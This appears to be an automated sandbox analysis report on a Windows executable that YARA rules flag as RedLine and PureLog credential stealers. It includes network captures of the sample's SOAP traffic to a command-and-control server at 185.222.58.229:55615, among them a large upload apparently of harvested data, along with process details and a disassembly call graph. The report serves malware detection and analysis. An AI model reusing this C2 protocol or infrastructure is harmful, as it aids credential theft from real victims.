                                                                                                                                                Dec 3, 2024 13:27:17.308779001 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.308821917 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.308878899 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.308945894 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.308953047 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309041977 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309122086 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309129953 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309138060 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309206963 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309214115 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309293985 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309309959 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309420109 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309427977 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309506893 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309514999 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309606075 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309614897 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309694052 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309701920 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309753895 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309794903 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309850931 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309858084 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309931040 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.309979916 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310053110 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310069084 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310220957 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310229063 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310256004 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310292959 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310375929 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310384035 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310419083 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310468912 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310549021 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310597897 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310652018 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310658932 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310703039 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310719013 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310817957 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310825109 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310875893 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310924053 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.310956001 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311017036 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311058998 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311110973 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311191082 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311208010 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311319113 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311326981 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311395884 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311405897 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311433077 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311467886 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311528921 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311537027 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311610937 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311626911 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311676979 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311724901 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311749935 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311800003 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311912060 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.311928034 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312014103 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312022924 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312102079 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312109947 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312191010 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312212944 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312254906 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312335968 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312392950 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312401056 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312505960 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312514067 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312596083 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312602997 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312671900 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312679052 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312733889 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312773943 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312808037 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312839985 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312903881 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312911034 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312977076 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.312984943 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313038111 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313090086 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313142061 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313149929 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313239098 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313246965 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313302040 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313311100 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313352108 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313395023 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313446999 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313493013 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313538074 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313546896 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313600063 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313607931 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313652992 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313709974 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313741922 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.313756943 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:17.360336065 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:18.446234941 CET5561549739185.222.58.229192.168.2.4
                                                                                                                                                Dec 3, 2024 13:27:18.460504055 CET4973755615192.168.2.4185.222.58.229
                                                                                                                                                Dec 3, 2024 13:27:18.460679054 CET4973955615192.168.2.4185.222.58.229

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 3, 2024 13:27:08.543858051 CET5156653192.168.2.41.1.1.1

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 3, 2024 13:27:08.543858051 CET192.168.2.41.1.1.10x2d86Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 3, 2024 13:27:09.068423033 CET1.1.1.1192.168.2.40x2d86No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • 185.222.58.229:55615

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.449733185.222.58.229556153808C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 3, 2024 13:27:00.911386967 CET241OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                                                                                Host: 185.222.58.229:55615
                                                                                                                                                Content-Length: 137
                                                                                                                                                Expect: 100-continue
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 3, 2024 13:27:02.182149887 CET25INHTTP/1.1 100 Continue
                                                                                                                                                Dec 3, 2024 13:27:02.425539017 CET359INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 212
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Tue, 03 Dec 2024 12:27:01 GMT
                                                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                                                                                Dec 3, 2024 13:27:07.551135063 CET224OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                                                                                Host: 185.222.58.229:55615
                                                                                                                                                Content-Length: 144
                                                                                                                                                Expect: 100-continue
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                Dec 3, 2024 13:27:07.951133013 CET25INHTTP/1.1 100 Continue
                                                                                                                                                Dec 3, 2024 13:27:08.330627918 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 8386
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Tue, 03 Dec 2024 12:27:08 GMT
                                                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>113.90.86.3</b:string><b:string>103.116.72.6</b:string><b:string>14.156.228.31</b:string><b:string>14.156.228.31</b:string><b:string>115.197.171.138</b:string><b:string>124.236.146.114</b:string><b:string>120.235.72.180</b:string><b:string>125.38.179.154</b:string><b:string>123.131.71.177</b:string><b:string>119.139.137.75</b:string><b:string>14.156.228.31</b:string><b:string>106.113.69.63</b:string><b:string>220.180.154.14</b:string><b:string>139.186.206.86</b:string><b:string>115.213.227.217</b:string><b:string>120.41.179.186</b:string><b:string>219.146.127.99</b:string><b:string>106.114.20 [TRUNCATED]


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.449737185.222.58.229556153808C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 3, 2024 13:27:12.661587954 CET222OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                                                                                Host: 185.222.58.229:55615
                                                                                                                                                Content-Length: 956493
                                                                                                                                                Expect: 100-continue
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                Dec 3, 2024 13:27:15.543055058 CET294INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 147
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Tue, 03 Dec 2024 12:27:15 GMT
                                                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.449739185.222.58.229556153808C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Dec 3, 2024 13:27:15.666400909 CET242OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                Host: 185.222.58.229:55615
                                                                                                                                                Content-Length: 956485
                                                                                                                                                Expect: 100-continue
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Dec 3, 2024 13:27:18.446234941 CET408INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 261
                                                                                                                                                Content-Type: text/xml; charset=utf-8
                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                Date: Tue, 03 Dec 2024 12:27:18 GMT
                                                                                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:07:26:56
                                                                                                                                                Start date:03/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\lWnSA7IyVc.exe"
                                                                                                                                                Imagebase:0x180000
                                                                                                                                                File size:703'488 bytes
                                                                                                                                                MD5 hash:3726EE297E39481C17EFBE020EF5CFCC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:07:26:58
                                                                                                                                                Start date:03/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\lWnSA7IyVc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\lWnSA7IyVc.exe"
                                                                                                                                                Imagebase:0xe50000
                                                                                                                                                File size:703'488 bytes
                                                                                                                                                MD5 hash:3726EE297E39481C17EFBE020EF5CFCC
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:07:26:58
                                                                                                                                                Start date:03/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:11.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:1.2%
                                                                                                                                                  Total number of Nodes:251
                                                                                                                                                  Total number of Limit Nodes:13
                                                                                                                                                  execution_graph 36928 6981f18 36932 6981f50 36928->36932 36936 6981f40 36928->36936 36929 6981f37 36933 6981f59 36932->36933 36940 6981f88 36933->36940 36934 6981f7e 36934->36929 36937 6981f50 36936->36937 36939 6981f88 DrawTextExW 36937->36939 36938 6981f7e 36938->36929 36939->36938 36941 6981fd3 36940->36941 36942 6981fc2 36940->36942 36943 6982061 36941->36943 36946 69822b0 36941->36946 36951 69822c0 36941->36951 36942->36934 36943->36934 36947 69822c0 36946->36947 36948 69823ee 36947->36948 36956 69854f0 36947->36956 36961 69854e3 36947->36961 36948->36942 36952 69822e8 36951->36952 36953 69823ee 36952->36953 36954 69854f0 DrawTextExW 36952->36954 36955 69854e3 DrawTextExW 36952->36955 36953->36942 36954->36953 36955->36953 36957 6985506 36956->36957 36966 6985949 36957->36966 36971 6985958 36957->36971 36958 698557c 36958->36948 36962 69854f0 36961->36962 36964 6985958 DrawTextExW 36962->36964 36965 6985949 DrawTextExW 36962->36965 36963 698557c 36963->36948 36964->36963 36965->36963 36967 6985958 36966->36967 36975 6985998 36967->36975 36980 6985989 36967->36980 36968 6985976 36968->36958 36973 6985998 DrawTextExW 36971->36973 36974 6985989 DrawTextExW 36971->36974 36972 6985976 36972->36958 36973->36972 36974->36972 36976 69859b5 36975->36976 36977 69859f6 36976->36977 36985 6985a18 36976->36985 36990 6985a08 36976->36990 36977->36968 36981 6985992 36980->36981 36982 69859f6 36981->36982 36983 6985a18 DrawTextExW 36981->36983 36984 6985a08 DrawTextExW 36981->36984 36982->36968 36983->36982 36984->36982 36987 6985a39 36985->36987 36986 6985a4e 36986->36977 36987->36986 36995 6984060 36987->36995 36989 6985aa9 36992 6985a18 36990->36992 36991 6985a4e 36991->36977 36992->36991 36993 6984060 DrawTextExW 36992->36993 36994 6985aa9 36993->36994 36997 698406b 36995->36997 36996 6985e39 36996->36989 36997->36996 